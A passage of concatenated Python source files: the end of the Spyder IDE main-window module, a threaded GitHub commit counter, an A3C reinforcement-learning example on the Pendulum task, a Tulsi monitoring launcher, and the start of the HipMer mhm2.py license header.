editor.setup_open_files(close_previous_files=False)
def restore_undocked_plugins(self):
"""Restore plugins that were undocked in the previous session."""
logger.info("Restoring undocked plugins from the previous session")
for plugin_name in PLUGIN_REGISTRY:
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
if isinstance(plugin, SpyderDockablePlugin):
if plugin.get_conf('undocked_on_window_close', default=False):
plugin.get_widget().create_window()
elif isinstance(plugin, SpyderPluginWidget):
if plugin.get_option('undocked_on_window_close',
default=False):
plugin._create_window()
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
elif running_in_mac_app() or is_pynsist():
title = "Spyder"
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if get_debug_level():
title += u" [DEBUG MODE %d]" % get_debug_level()
window_title = self._cli_options.window_title
if window_title is not None:
title += u' -- ' + to_text_string(window_title)
# TODO: Remove self.projects reference once there's an API for setting
# window title.
projects = self.get_plugin(Plugins.Projects, error=False)
if projects:
path = projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
# TODO: To be removed after all actions are moved to their corresponding
# plugins
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_shortcut_to_tip=True, plugin_name=None):
shortcuts = self.get_plugin(Plugins.Shortcuts, error=False)
if shortcuts:
shortcuts.register_shortcut(
qaction_or_qshortcut,
context,
name,
add_shortcut_to_tip=add_shortcut_to_tip,
plugin_name=plugin_name,
)
# --- Other
def update_source_menu(self):
"""Update source menu options that vary dynamically."""
# This is necessary to avoid an error at startup.
# Fixes spyder-ide/spyder#14901
try:
editor = self.get_plugin(Plugins.Editor, error=False)
if editor:
editor.refresh_formatter_name()
except AttributeError:
pass
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(action._shown_shortcut)
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.show_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(QKeySequence())
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.hide_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_options_menus(self):
"""Hide options menu when menubar is pressed in macOS."""
for plugin in self.widgetlist + self.thirdparty_plugins:
if plugin.CONF_SECTION == 'editor':
editorstack = self.editor.get_current_editorstack()
editorstack.menu.hide()
else:
try:
# New API
plugin.options_menu.hide()
except AttributeError:
# Old API
plugin._options_menu.hide()
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
widget = QApplication.focusWidget()
textedit_properties = None
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
console = isinstance(widget, ControlWidget)
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
if hasattr(self, 'editor'):
# Editor has focus and there is no file opened in it
if (not console and not_readonly and self.editor
and not self.editor.is_file_opened()):
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
self.undo_action.setEnabled( readwrite_editor \
and widget.document().isUndoAvailable() )
self.redo_action.setEnabled( readwrite_editor \
and widget.document().isRedoAvailable() )
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
if self.get_plugin(Plugins.Editor, error=False):
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
# Disabling all actions except the last one
# (which is Find in files) to begin with
for child in self.search_menu.actions()[:-1]:
child.setEnabled(False)
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Find actions only trigger an effect in the Editor
if not console:
for action in self.search_menu.actions():
try:
action.setEnabled(True)
except RuntimeError:
pass
# Disable the replace action for read-only files
if len(self.search_menu_actions) > 3:
self.search_menu_actions[3].setEnabled(readwrite_editor)
def createPopupMenu(self):
return self.application.get_application_context_menu(parent=self)
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
logger.info(message)
self.splash.show()
self.splash.showMessage(message,
int(Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute),
QColor(Qt.white))
QApplication.processEvents()
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if hasattr(self, 'layouts'):
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: Remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(
self.last_focused_widget):
plugin.change_visibility(True)
except AttributeError:
# Old API
if plugin.isAncestorOf(self.last_focused_widget):
plugin._visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False, close_immediately=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
self.plugin_registry = PLUGIN_REGISTRY
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
can_close = self.plugin_registry.delete_all_plugins(
excluding={Plugins.Layout},
close_immediately=close_immediately)
if not can_close and not close_immediately:
return False
# Save window settings *after* closing all plugin windows, in order
# to show them in their previous locations in the next session.
# Fixes spyder-ide/spyder#12139
prefix = 'window' + '/'
if self.layouts is not None:
self.layouts.save_current_window_settings(prefix)
try:
layouts_container = self.layouts.get_container()
if layouts_container:
layouts_container.close()
layouts_container.deleteLater()
self.layouts.deleteLater()
self.plugin_registry.delete_plugin(
Plugins.Layout, teardown=False)
except RuntimeError:
pass
self.already_closed = True
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
QApplication.processEvents()
return True
def add_dockwidget(self, plugin):
"""
Add a plugin QDockWidget to the main window.
"""
try:
# New API
if plugin.is_compatible:
dockwidget, location = plugin.create_dockwidget(self)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
except AttributeError:
# Old API
if plugin._is_compatible:
dockwidget, location = plugin._create_dockwidget()
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
getattr(widget, callback)()
else:
return
def redirect_internalshell_stdio(self, state):
console = self.get_plugin(Plugins.Console, error=False)
if console:
if state:
console.redirect_stds()
else:
console.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
editor = self.get_plugin(Plugins.Editor, error=False)
variableexplorer = self.get_plugin(
Plugins.VariableExplorer, error=False)
if encoding.is_text_file(fname):
if editor:
editor.load(fname)
elif variableexplorer is not None and ext in IMPORT_EXT:
variableexplorer.get_widget().import_data(fname)
elif not external:
fname = file_uri(fname)
start_file(fname)
def get_initial_working_directory(self):
"""Return the initial working directory."""
return self.INITIAL_CWD
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
# Check that file exists
fname = encoding.to_unicode_from_fs(fname)
initial_cwd = self.get_initial_working_directory()
if osp.exists(osp.join(initial_cwd, fname)):
fpath = osp.join(initial_cwd, fname)
elif osp.exists(fname):
fpath = fname
else:
return
# Don't open script that starts Spyder at startup.
# Fixes issue spyder-ide/spyder#14483
if sys.platform == 'darwin' and 'bin/spyder' in fname:
return
if osp.isfile(fpath):
self.open_file(fpath, external=True)
elif osp.isdir(fpath):
QMessageBox.warning(
self, _("Error"),
_('To open <code>{fpath}</code> as a project with Spyder, '
'please use <code>spyder -p "{fname}"</code>.')
.format(fpath=osp.normpath(fpath), fname=fname)
)
# --- Path Manager
# ------------------------------------------------------------------------
def load_python_path(self):
"""Load path stored in Spyder configuration folder."""
if osp.isfile(self.SPYDER_PATH):
with open(self.SPYDER_PATH, 'r', encoding='utf-8') as f:
path = f.read().splitlines()
self.path = tuple(name for name in path if osp.isdir(name))
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
with open(self.SPYDER_NOT_ACTIVE_PATH, 'r',
encoding='utf-8') as f:
not_active_path = f.read().splitlines()
self.not_active_path = tuple(name for name in not_active_path
if osp.isdir(name))
def save_python_path(self, new_path_dict):
"""
Save path in Spyder configuration folder.
`new_path_dict` is an OrderedDict that has the new paths as keys and
the state as values. The state is `True` for active and `False` for
inactive.
"""
path = [p for p in new_path_dict]
not_active_path = [p for p in new_path_dict if not new_path_dict[p]]
try:
encoding.writelines(path, self.SPYDER_PATH)
encoding.writelines(not_active_path, self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError as e:
logger.error(str(e))
CONF.set('main', 'spyder_pythonpath', self.get_spyder_pythonpath())
def get_spyder_pythonpath_dict(self):
"""
Return Spyder PYTHONPATH.
The returned ordered dictionary has the paths as keys and the state
as values. The state is `True` for active and `False` for inactive.
Example:
OrderedDict([('/some/path, True), ('/some/other/path, False)])
"""
self.load_python_path()
path_dict = OrderedDict()
for path in self.path:
path_dict[path] = path not in self.not_active_path
for path in self.project_path:
path_dict[path] = True
return path_dict
def get_spyder_pythonpath(self):
"""
Return Spyder PYTHONPATH.
"""
path_dict = self.get_spyder_pythonpath_dict()
path = [k for k, v in path_dict.items() if v]
return path
def update_python_path(self, new_path_dict):
"""Update python path on Spyder interpreter and kernels."""
# Load previous path
path_dict = self.get_spyder_pythonpath_dict()
# Save path
if path_dict != new_path_dict:
# It doesn't include the project_path
self.save_python_path(new_path_dict)
# Load new path
new_path_dict_p = self.get_spyder_pythonpath_dict() # Includes project
# Update Spyder interpreter
for path in path_dict:
while path in sys.path:
sys.path.remove(path)
for path, active in reversed(new_path_dict_p.items()):
if active:
sys.path.insert(1, path)
# Any plugin that needs to do some work based on this signal should
# connect to it on plugin registration
self.sig_pythonpath_changed.emit(path_dict, new_path_dict_p)
@Slot()
def show_path_manager(self):
"""Show path manager dialog."""
def _dialog_finished(result_code):
"""Restore path manager dialog instance variable."""
self._path_manager = None
if self._path_manager is None:
from spyder.widgets.pathmanager import PathManager
projects = self.get_plugin(Plugins.Projects, error=False)
read_only_path = ()
if projects:
read_only_path = tuple(projects.get_pythonpath())
dialog = PathManager(self, self.path, read_only_path,
self.not_active_path, sync=True)
self._path_manager = dialog
dialog.sig_path_changed.connect(self.update_python_path)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.finished.connect(_dialog_finished)
dialog.show()
else:
self._path_manager.show()
self._path_manager.activateWindow()
self._path_manager.raise_()
self._path_manager.setFocus()
def pythonpath_changed(self):
"""Project's PYTHONPATH contribution has changed."""
projects = self.get_plugin(Plugins.Projects, error=False)
self.project_path = ()
if projects:
self.project_path = tuple(projects.get_pythonpath())
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
#---- Preferences
def apply_settings(self):
"""Apply main window settings."""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes spyder-ide/spyder#2036.
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
self.setDockOptions(default)
self.apply_panes_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(
CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings."""
for plugin in (self.widgetlist + self.thirdparty_plugins):
features = plugin.dockwidget.FEATURES
plugin.dockwidget.setFeatures(features)
try:
# New API
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
except AttributeError:
# Old API
plugin._update_margins()
@Slot()
def show_preferences(self):
"""Edit Spyder preferences."""
self.preferences.open_dialog(self.prefs_dialog_size)
def set_prefs_size(self, size):
"""Save preferences dialog size."""
self.prefs_dialog_size = size
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
while 1: # 1 is faster than True
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See spyder-ide/spyder#1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
if self.already_closed:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
Quit and reset Spyder and then Restart application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False, close_immediately=False):
"""Wrapper to handle plugins request to restart Spyder."""
self.application.restart(
reset=reset, close_immediately=close_immediately)
# ---- Global Switcher
def open_switcher(self, symbol=False):
"""Open switcher dialog box."""
if self.switcher is not None and self.switcher.isVisible():
self.switcher.clear()
self.switcher.hide()
return
if symbol:
self.switcher.set_search_text('@')
else:
self.switcher.set_search_text('')
self.switcher.setup()
self.switcher.show()
# Note: The +6 pixel on the top makes it look better
# FIXME: Why is this using the toolbars menu? A: To not be on top of
# the toolbars.
# Probably toolbars should be taken into account for this 'delta' only
# when are visible
delta_top = (self.toolbar.toolbars_menu.geometry().height() +
self.menuBar().geometry().height() + 6)
self.switcher.set_position(delta_top)
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_switcher(symbol=True)
def create_switcher(self):
"""Create switcher dialog instance."""
if self.switcher is None:
from spyder.widgets.switcher import Switcher
self.switcher = Switcher(self)
return self.switcher
# --- For OpenGL
def _test_setting_opengl(self, option):
"""Get the current OpenGL implementation in use"""
if option == 'software':
return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL)
elif option == 'desktop':
return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL)
elif option == 'gles':
return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES)
#==============================================================================
# Main
#==============================================================================
def main(options, args):
"""Main function"""
# **** For Pytest ****
if running_under_pytest():
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
app = create_application()
window = create_window(MainWindow, app, None, options, None)
return window
# **** Handle hide_console option ****
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize
or bool(get_debug_level()))
# **** Set OpenGL implementation to use ****
# This attribute must be set before creating the application.
# See spyder-ide/spyder#11227
if options.opengl_implementation:
option = options.opengl_implementation
set_opengl_implementation(option)
else:
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
# **** Set high DPI scaling ****
# This attribute must be set before creating the application.
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling,
CONF.get('main', 'high_dpi_scaling'))
# **** Set debugging info ****
if get_debug_level() > 0:
delete_debug_log_files()
setup_logging(options)
# **** Create the application ****
app = create_application()
# **** Create splash screen ****
splash = create_splash_screen()
if splash is not None:
splash.show()
splash.showMessage(
_("Initializing..."),
int(Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute),
QColor(Qt.white)
)
QApplication.processEvents()
if options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults()
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# **** Read faulthandler log file ****
faulthandler_file = get_conf_path('faulthandler.log')
previous_crash = ''
if osp.exists(faulthandler_file):
with open(faulthandler_file, 'r') as f:
previous_crash = f.read()
# Remove file to not pick it up for next time.
try:
dst = get_conf_path('faulthandler.log.old')
shutil.move(faulthandler_file, dst)
except Exception:
pass
CONF.set('main', 'previous_crash', previous_crash)
# **** Set color for links ****
set_links_color(app)
# **** Create main window ****
mainwindow = None
try:
if PY3 and options.report_segfault:
import faulthandler
with open(faulthandler_file, 'w') as f:
faulthandler.enable(file=f)
mainwindow = create_window(
MainWindow, app, splash, options, args
)
else:
mainwindow = create_window(MainWindow, app, splash, options, args)
except FontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('appearance', 'icon_theme', 'spyder 2')
if mainwindow is None:
# An exception occurred
if splash is not None:
splash.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
streams.py
|
import time,threading,requests
start=time.time()
URL = 'https://api.github.com/repos/{name}/{repo}/commits?page=1&per_page=100'
dict1 = {
'Zinko17':'RestProject',
'cholponesn':'StomCentr',
'aliyaandabekova':'THE_BEST_PRICE',
'zhumakova':'SportBetProject',
}
result = {}
def worker(username,repository):
url=URL.format(name=username,repo=repository)
response=requests.get(url).json()
length=len(response)
result[username]=length
ts=[]
for key,value in dict1.items():
t=threading.Thread(target=worker,args=(key,value))
t.start()
ts.append(t)
for thread in ts:
thread.join()
print(time.time()-start)
print(result)
|
A3C.py
|
"""
Asynchronous Advantage Actor Critic (A3C) with continuous action space, Reinforcement Learning.
The Pendulum example.
View more on my tutorial page: https://morvanzhou.github.io/tutorials/
Using:
tensorflow 1.8.0
gym 0.10.5
"""
import multiprocessing
import threading
import tensorflow as tf
import numpy as np
import gym
import os
import shutil
import matplotlib.pyplot as plt
GAME = 'Pendulum-v0'
OUTPUT_GRAPH = True
LOG_DIR = './log'
N_WORKERS = multiprocessing.cpu_count()
MAX_EP_STEP = 200
MAX_GLOBAL_EP = 2000
GLOBAL_NET_SCOPE = 'Global_Net'
UPDATE_GLOBAL_ITER = 10
GAMMA = 0.9
ENTROPY_BETA = 0.01
LR_A = 0.0001 # learning rate for actor
LR_C = 0.001 # learning rate for critic
GLOBAL_RUNNING_R = []
GLOBAL_EP = 0
env = gym.make(GAME)
N_S = env.observation_space.shape[0]
N_A = env.action_space.shape[0]
A_BOUND = [env.action_space.low, env.action_space.high]
class ACNet(object):
def __init__(self, scope, globalAC=None):
if scope == GLOBAL_NET_SCOPE: # get global network
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_params, self.c_params = self._build_net(scope)[-2:]
else: # local net, calculate losses
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_his = tf.placeholder(tf.float32, [None, N_A], 'A')
self.v_target = tf.placeholder(tf.float32, [None, 1], 'Vtarget')
mu, sigma, self.v, self.a_params, self.c_params = self._build_net(scope)
td = tf.subtract(self.v_target, self.v, name='TD_error')
with tf.name_scope('c_loss'):
self.c_loss = tf.reduce_mean(tf.square(td))
with tf.name_scope('wrap_a_out'):
mu, sigma = mu * A_BOUND[1], sigma + 1e-4
normal_dist = tf.distributions.Normal(mu, sigma)
with tf.name_scope('a_loss'):
log_prob = normal_dist.log_prob(self.a_his)
exp_v = log_prob * tf.stop_gradient(td)
entropy = normal_dist.entropy() # encourage exploration
self.exp_v = ENTROPY_BETA * entropy + exp_v
self.a_loss = tf.reduce_mean(-self.exp_v)
with tf.name_scope('choose_a'): # use local params to choose action
self.A = tf.clip_by_value(tf.squeeze(normal_dist.sample(1), axis=[0, 1]), A_BOUND[0], A_BOUND[1])
with tf.name_scope('local_grad'):
self.a_grads = tf.gradients(self.a_loss, self.a_params)
self.c_grads = tf.gradients(self.c_loss, self.c_params)
with tf.name_scope('sync'):
with tf.name_scope('pull'):
self.pull_a_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.a_params, globalAC.a_params)]
self.pull_c_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.c_params, globalAC.c_params)]
with tf.name_scope('push'):
self.update_a_op = OPT_A.apply_gradients(zip(self.a_grads, globalAC.a_params))
self.update_c_op = OPT_C.apply_gradients(zip(self.c_grads, globalAC.c_params))
def _build_net(self, scope):
w_init = tf.random_normal_initializer(0., .1)
with tf.variable_scope('actor'):
l_a = tf.layers.dense(self.s, 200, tf.nn.relu6, kernel_initializer=w_init, name='la')
mu = tf.layers.dense(l_a, N_A, tf.nn.tanh, kernel_initializer=w_init, name='mu')
sigma = tf.layers.dense(l_a, N_A, tf.nn.softplus, kernel_initializer=w_init, name='sigma')
with tf.variable_scope('critic'):
l_c = tf.layers.dense(self.s, 100, tf.nn.relu6, kernel_initializer=w_init, name='lc')
v = tf.layers.dense(l_c, 1, kernel_initializer=w_init, name='v') # state value
a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
return mu, sigma, v, a_params, c_params
def update_global(self, feed_dict): # run by a local
SESS.run([self.update_a_op, self.update_c_op], feed_dict) # local grads applies to global net
def pull_global(self): # run by a local
SESS.run([self.pull_a_params_op, self.pull_c_params_op])
def choose_action(self, s): # run by a local
s = s[np.newaxis, :]
return SESS.run(self.A, {self.s: s})
class Worker(object):
def __init__(self, name, globalAC):
self.env = gym.make(GAME).unwrapped
self.name = name
self.AC = ACNet(name, globalAC)
def work(self):
global GLOBAL_RUNNING_R, GLOBAL_EP
total_step = 1
buffer_s, buffer_a, buffer_r = [], [], []
while not COORD.should_stop() and GLOBAL_EP < MAX_GLOBAL_EP:
s = self.env.reset()
ep_r = 0
for ep_t in range(MAX_EP_STEP):
# if self.name == 'W_0':
# self.env.render()
a = self.AC.choose_action(s)
s_, r, done, info = self.env.step(a)
done = True if ep_t == MAX_EP_STEP - 1 else False
ep_r += r
buffer_s.append(s)
buffer_a.append(a)
buffer_r.append((r + 8) / 8) # normalize
if total_step % UPDATE_GLOBAL_ITER == 0 or done: # update global and assign to local net
if done:
v_s_ = 0 # terminal
else:
v_s_ = SESS.run(self.AC.v, {self.AC.s: s_[np.newaxis, :]})[0, 0]
buffer_v_target = []
for r in buffer_r[::-1]: # reverse buffer r
v_s_ = r + GAMMA * v_s_
buffer_v_target.append(v_s_)
buffer_v_target.reverse()
buffer_s, buffer_a, buffer_v_target = np.vstack(buffer_s), np.vstack(buffer_a), np.vstack(buffer_v_target)
feed_dict = {
self.AC.s: buffer_s,
self.AC.a_his: buffer_a,
self.AC.v_target: buffer_v_target,
}
self.AC.update_global(feed_dict)
buffer_s, buffer_a, buffer_r = [], [], []
self.AC.pull_global()
s = s_
total_step += 1
if done:
if len(GLOBAL_RUNNING_R) == 0: # record running episode reward
GLOBAL_RUNNING_R.append(ep_r)
else:
GLOBAL_RUNNING_R.append(0.9 * GLOBAL_RUNNING_R[-1] + 0.1 * ep_r)
print(
self.name,
"Ep:", GLOBAL_EP,
"| Ep_r: %i" % GLOBAL_RUNNING_R[-1],
)
GLOBAL_EP += 1
break
if __name__ == "__main__":
SESS = tf.Session()
with tf.device("/cpu:0"):
OPT_A = tf.train.RMSPropOptimizer(LR_A, name='RMSPropA')
OPT_C = tf.train.RMSPropOptimizer(LR_C, name='RMSPropC')
GLOBAL_AC = ACNet(GLOBAL_NET_SCOPE) # we only need its params
workers = []
# Create worker
for i in range(N_WORKERS):
i_name = 'W_%i' % i # worker name
workers.append(Worker(i_name, GLOBAL_AC))
COORD = tf.train.Coordinator()
SESS.run(tf.global_variables_initializer())
if OUTPUT_GRAPH:
if os.path.exists(LOG_DIR):
shutil.rmtree(LOG_DIR)
tf.summary.FileWriter(LOG_DIR, SESS.graph)
worker_threads = []
for worker in workers:
job = lambda: worker.work()
t = threading.Thread(target=job)
t.start()
worker_threads.append(t)
COORD.join(worker_threads)
plt.plot(np.arange(len(GLOBAL_RUNNING_R)), GLOBAL_RUNNING_R)
plt.xlabel('step')
plt.ylabel('Total moving reward')
plt.show()
|
Tulsi.py
|
#!/usr/bin/env python
# Copyright (c) 2015 Vedams Software Solutions PVT LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing
from TulsiClientMain import TulsiClientMain
from TulsiStatsdClientMain import TulsiStatsdClientMain
from Server_Monitor import Server_Monitor
def tulsiclient():
name = multiprocessing.current_process().name
tulsimain = TulsiClientMain()
def tulsistatsdclient():
name = multiprocessing.current_process().name
tulsistatsd = TulsiStatsdClientMain()
#def tulsimonitorclient():
# name = multiprocessing.current_process().name
# tulsimonitor=TulsiMonitorMain()
if __name__ == '__main__':
tulsiclientmain = multiprocessing.Process(name='udp client main',
target=tulsiclient)
tulsistatsdclientmain =\
multiprocessing.Process(name='udp statsd client main',
target=tulsistatsdclient)
#tulsiservicemain = multiprocessing.Process(name='monitor main',
# target=tulsimonitorclient)
tulsiclientmain.start()
tulsistatsdclientmain.start()
#tulsiservicemain.start()
servicetulsi = Server_Monitor()
servicetulsi.alert_module()
|
mhm2.py
|
#!/usr/bin/env python
# HipMer v 2.0, Copyright (c) 2020, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory (subject to receipt of any required
# approvals from the U.S. Dept. of Energy). All rights reserved."
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
# (1) Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# (2) Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
# (3) Neither the name of the University of California, Lawrence Berkeley National
# Laboratory, U.S. Dept. of Energy nor the names of its contributors may be used to
# endorse or promote products derived from this software without specific prior
# written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
